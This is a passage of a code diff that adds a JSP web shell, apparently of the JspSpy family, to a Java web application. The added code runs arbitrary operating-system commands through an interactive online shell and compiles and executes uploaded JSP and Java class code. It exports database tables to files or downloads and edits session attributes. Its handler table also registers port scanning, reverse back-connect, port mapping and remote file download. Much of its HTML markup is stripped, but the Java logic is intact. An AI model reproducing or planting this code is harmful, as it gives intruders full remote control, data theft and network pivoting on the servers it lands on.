"); + if (JSession.getAttribute(MSG) != null) { + Util.outMsg(out,JSession.getAttribute(MSG).toString()); + JSession.removeAttribute(MSG); + } + if (JSession.getAttribute(ENTER_MSG) != null) { + String outEntry = request.getParameter("outentry"); + if (Util.isEmpty(outEntry) || !outEntry.equals("true")) + Util.outMsg(out,JSession.getAttribute(ENTER_MSG).toString()); + } + } catch (Exception e) { + + throw e ; + } + } + } + private static class VOnLineShellInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + out.println(""); + out.println(""+ + " "+ + " "+ + " "+ + "
"); + out.println("

Shell OnLine »


"); + out.println("
"+ + " "+ + " "+ + " Notice ! If You Are Using IE , You Must Input Some Commands First After You Start Or You Will Not See The Echo"+ + "
"+ + "
"+ + " "+ + "
"+ + " "+ + " "+ + " "+ + " Auto Scroll"+ + " "+ + "
"+ + " " + ); + out.println("
"); + } catch (Exception e) { + throw e ; + } + } + } + private static class OnLineInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String type = request.getParameter("type"); + if (Util.isEmpty(type)) + return; + if (type.toLowerCase().equals("start")) { + String exe = request.getParameter("exe"); + if (Util.isEmpty(exe)) + return; + Process pro = Runtime.getRuntime().exec(exe); + ByteArrayOutputStream outs = new ByteArrayOutputStream(); + response.setContentLength(100000000); + response.setContentType("text/html;charset="+System.getProperty("file.encoding")); + OnLineProcess olp = new OnLineProcess(pro); + JSession.setAttribute(SHELL_ONLINE,olp); + new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); + new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); + new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start(); + Thread.sleep(1000 * 60 * 60 * 24); + } else if (type.equals("ecmd")) { + Object o = JSession.getAttribute(SHELL_ONLINE); + String cmd = request.getParameter("cmd"); + if (Util.isEmpty(cmd)) + return; + if (o == null) + return; + OnLineProcess olp = (OnLineProcess)o; + olp.setCmd(cmd); + } else { + Object o = JSession.getAttribute(SHELL_ONLINE); + if (o == null) + return; + OnLineProcess olp = (OnLineProcess)o; + olp.stop(); + } + } catch (Exception e) { + + throw e; + } + } + } + private static class EnterInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + if (!Util.isEmpty(type)) { + JSession.removeAttribute(ENTER); + JSession.removeAttribute(ENTER_MSG); + JSession.removeAttribute(ENTER_CURRENT_DIR); + JSession.setAttribute(MSG,"Exit File Success ! "); + } else { + String f = request.getParameter("filepath"); + if (Util.isEmpty(f)) + return; + JSession.setAttribute(ENTER,f); + JSession.setAttribute(ENTER_MSG,"You Are In File \""+f+"\" Now ! Exit "); + } + response.sendRedirect(SHELL_NAME); + } + } + private static class VExport2FileInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + PrintWriter out = response.getWriter(); + String type = request.getParameter("type"); + String sql = request.getParameter("sql"); + String table = request.getParameter("table"); + if (Util.isEmpty(sql) && Util.isEmpty(table)) { + JSession.setAttribute(SESSION_O,"vConn"); + response.sendRedirect(SHELL_NAME); + return; + } + out.println("
"+ + ""+ + " "+ + " "+ + " "+ + "
"+ + " "+ + " "+ + " "+ + " "+ + "

Export To File »

"+ + " "+ + "
Export \""+(Util.isEmpty(sql) ? table : sql.replaceAll("\"","""))+"\" To File :

"+BACK_HREF+"
"+ + "
"); + } + } + + private static class ExportInvoker extends DefaultInvoker { + public boolean doBefore(){return false;} + public boolean doAfter(){return false;} + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + String type = request.getParameter("type"); + String filepath = request.getParameter("filepath"); + String sql = null; + DBOperator dbo = null; + dbo = (DBOperator)JSession.getAttribute(DBO); + + if (Util.isEmpty(type)) { + //table export + String tb = request.getParameter("table"); + if (Util.isEmpty(tb)) + return; + String s = dbo.getConn().getMetaData().getIdentifierQuoteString(); + sql = "select * from "+s+tb+s; + + } else if (type.equals("queryexp")) { + //query export + sql = request.getParameter("sql"); + if (Util.isEmpty(sql)) { + JSession.setAttribute(SESSION_O,"vConn"); + response.sendRedirect(SHELL_NAME); + return; + } + } + Object o = dbo.execute(sql); + ByteArrayOutputStream bout = new ByteArrayOutputStream(); + byte[] rowSep = "\r\n".getBytes(); + if (o instanceof ResultSet) { + ResultSet rs = (ResultSet)o; + ResultSetMetaData meta = rs.getMetaData(); + int count = meta.getColumnCount(); + for (int i =1;i<=count;i++) { + String colName = meta.getColumnName(i)+"\t"; + byte[] b = colName.getBytes(); + bout.write(b,0,b.length); + } + bout.write(rowSep,0,rowSep.length); + while (rs.next()) { + for (int i =1;i<=count;i++) { + String v = null; + try { + v = rs.getString(i); + } catch (SQLException ex) { + v = "<>"; + } + v += "\t"; + byte[] b = v.getBytes(); + bout.write(b,0,b.length); + } + bout.write(rowSep,0,rowSep.length); + } + rs.close(); + ByteArrayInputStream input = new ByteArrayInputStream(bout.toByteArray()); + BufferedOutputStream output = null; + if (!Util.isEmpty(filepath)) { + //export2file + output = new BufferedOutputStream(new FileOutputStream(new File(filepath))); + } else { + //download. + response.setHeader("Content-Disposition","attachment;filename=DataExport.txt"); + output = new BufferedOutputStream(response.getOutputStream()); + } + byte[] data = new byte[1024]; + int len = input.read(data); + while (len != -1) { + output.write(data,0,len); + len = input.read(data); + } + bout.close(); + input.close(); + output.close(); + if (!Util.isEmpty(filepath)) { + JSession.setAttribute(MSG,"Export To File Success !"); + response.sendRedirect(SHELL_NAME); + } + } + } + } + private static class EvalInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + String type = request.getParameter("type"); + PrintWriter out = response.getWriter(); + Object msg = JSession.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out,(String)msg); + JSession.removeAttribute(MSG); + } + if (Util.isEmpty(type)) { + out.println(""+ + " "+ + " "+ + " "+ + "

Eval Java Code »

"+ + "
"+ + "

"+ + "

"+ + "UpLoad a Class File : "); + Util.outMsg(out,"
"+
+					"public class SpyEval{\r\n"+
+					"	static {\r\n"+
+					"		//Your Code Here.\r\n"+
+					"	}\r\n"+
+					"}\r\n"+
+					"
","left"); + out.println("
"+ + "

Jsp Eval :
"+ + " "+ + " "+ + "
"+ + "
"+ + "

"+ + "
"); + } else if (type.equals("jsp")){ + String jspc = request.getParameter("jspc"); + if (Util.isEmpty(jspc)) + return; + File f = new File(SHELL_DIR,"evaltmpninty.jsp"); + BufferedWriter writer = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(f),"utf-8")); + writer.write(jspc,0,jspc.length()); + writer.flush(); + writer.close(); + out.println(""+ + " "+ + "

Jsp Eval Result »

"); + out.println("
"); + request.getRequestDispatcher("evaltmpninty.jsp").include(request,response); + out.println("
"); + f.delete(); + } + } + } + private static class EvalUploadInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + ByteArrayOutputStream stream = new ByteArrayOutputStream(); + UploadBean upload = new UploadBean(); + upload.setTargetOutput(stream); + upload.parseRequest(request); + + if (stream.toByteArray().length == 2) { + JSession.setAttribute(MSG,"Please Upload Your Class File ! "); + ((Invoker)ins.get("ev")).invoke(request,response,JSession); + return; + } + SpyClassLoader loader = new SpyClassLoader(); + try { + Class c = loader.defineClass(null,stream.toByteArray()); + c.newInstance(); + }catch(Exception e) { + } + stream.close(); + JSession.setAttribute(MSG,"Eval Java Class Done ! "); + ((Invoker)ins.get("ev")).invoke(request,response,JSession); + } + } + private static class VOtherInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + PrintWriter out = response.getWriter(); + Object msg = JSession.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out,(String)msg); + JSession.removeAttribute(MSG); + } + out.println(""+ + " "+ + " "+ + " "+ + "

Session Manager>>

"+ + "
"+ + "
    "); + Enumeration en = JSession.getAttributeNames(); + while (en.hasMoreElements()) { + Object o = en.nextElement(); + if (o.toString().equals(MSG)) + continue; + out.println("
  • "+o.toString()+" "); + out.println(" "); + out.println(""); + out.println(""); + out.println("
    • "); + } + out.println("
  • "+ + "New Session Attribute"+ + "name : value : "+ + "
"); + } catch (Exception e) { + throw e ; + } + } + } + //Session Manager + private static class SmInvoker extends DefaultInvoker { + public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ + try { + String type = request.getParameter("type"); + PrintWriter out = response.getWriter(); + if (type.equals("update")) { + String name = request.getParameter("name"); + String value = request.getParameter("value"); + JSession.setAttribute(name,value); + JSession.setAttribute(MSG,"Update/Add Attribute Success !"); + } else if (type.equals("delete")) { + String name = request.getParameter("name"); + JSession.removeAttribute(name); + JSession.setAttribute(MSG,"Remove Attribute Success !"); + } + ((Invoker)ins.get("vother")).invoke(request,response,JSession); + } catch (Exception e) { + + throw e ; + } + } + } + + static{ + ins.put("script",new ScriptInvoker()); + ins.put("before",new BeforeInvoker()); + ins.put("after",new AfterInvoker()); + ins.put("deleteBatch",new DeleteBatchInvoker()); + ins.put("clipboard",new ClipBoardInvoker()); + ins.put("vPortScan",new VPortScanInvoker()); + ins.put("portScan",new PortScanInvoker()); + ins.put("vConn",new VConnInvoker()); + ins.put("dbc",new DbcInvoker()); + ins.put("executesql",new ExecuteSQLInvoker()); + ins.put("vLogin",new VLoginInvoker()); + ins.put("login",new LoginInvoker()); + ins.put("filelist", new FileListInvoker()); + ins.put("logout",new LogoutInvoker()); + ins.put("upload",new UploadInvoker()); + ins.put("copy",new CopyInvoker()); + ins.put("bottom",new BottomInvoker()); + ins.put("vCreateFile",new VCreateFileInvoker()); + ins.put("vEdit",new VEditInvoker()); + ins.put("createFile",new CreateFileInvoker()); + ins.put("vEditProperty",new VEditPropertyInvoker()); + ins.put("editProperty",new EditPropertyInvoker()); + ins.put("vs",new VsInvoker()); + ins.put("shell",new ShellInvoker()); + ins.put("down",new DownInvoker()); + ins.put("vd",new VdInvoker()); + ins.put("downRemote",new DownRemoteInvoker()); + ins.put("index",new IndexInvoker()); + ins.put("mkdir",new MkDirInvoker()); + ins.put("move",new MoveInvoker()); + ins.put("removedir",new RemoveDirInvoker()); + ins.put("packBatch",new PackBatchInvoker()); + ins.put("pack",new PackInvoker()); + ins.put("unpack",new UnPackInvoker()); + ins.put("vmp",new VmpInvoker()); + ins.put("vbc",new VbcInvoker()); + ins.put("backConnect",new BackConnectInvoker()); + ins.put("jspEnv",new JspEnvInvoker()); + ins.put("smp",new SmpInvoker()); + ins.put("mapPort",new MapPortInvoker()); + ins.put("top",new TopInvoker()); + ins.put("vso",new VOnLineShellInvoker()); + ins.put("online",new OnLineInvoker()); + ins.put("enter",new EnterInvoker()); + ins.put("export",new ExportInvoker()); + ins.put("ev",new EvalInvoker()); + ins.put("eu",new EvalUploadInvoker()); + ins.put("vother",new VOtherInvoker()); + ins.put("sm",new SmInvoker()); + ins.put("vExport",new VExport2FileInvoker()); + ins.put("vPack",new VPackConfigInvoker()); + ins.put("reflect",new ReflectInvoker()); + ins.put("portBack",new PortBackInvoker()); + } +%> +<% + try { + String o = request.getParameter("o"); + if (Util.isEmpty(o)) { + if (session.getAttribute(SESSION_O) == null) + o = "index"; + else { + o = session.getAttribute(SESSION_O).toString(); + session.removeAttribute(SESSION_O); + } + } + Object obj = ins.get(o); + if (obj == null) { + response.sendRedirect(SHELL_NAME); + } else { + Invoker in = (Invoker)obj; + if (in.doBefore()) { + String path = request.getParameter("folder"); + if (!Util.isEmpty(path) && session.getAttribute(ENTER) == null) + session.setAttribute(CURRENT_DIR,path); + ((Invoker)ins.get("before")).invoke(request,response,session); + ((Invoker)ins.get("script")).invoke(request,response,session); + ((Invoker)ins.get("top")).invoke(request,response,session); + } + in.invoke(request,response,session); + if (!in.doAfter()) { + return; + }else{ + ((Invoker)ins.get("bottom")).invoke(request,response,session); + ((Invoker)ins.get("after")).invoke(request,response,session); + } + } + } catch (Exception e) { + Object msg = session.getAttribute(MSG); + if (msg != null) { + Util.outMsg(out,(String)msg); + session.removeAttribute(MSG); + } + if (e.toString().indexOf("ClassCastException") != -1) { + Util.outMsg(out,MODIFIED_ERROR + BACK_HREF); + } + ByteArrayOutputStream bout = new ByteArrayOutputStream(); + e.printStackTrace(new PrintStream(bout)); + session.setAttribute(CURRENT_DIR,SHELL_DIR); + Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replaceAll("\n","
"),"left"); + bout.close(); + out.flush(); + ((Invoker)ins.get("bottom")).invoke(request,response,session); + ((Invoker)ins.get("after")).invoke(request,response,session); + } +%>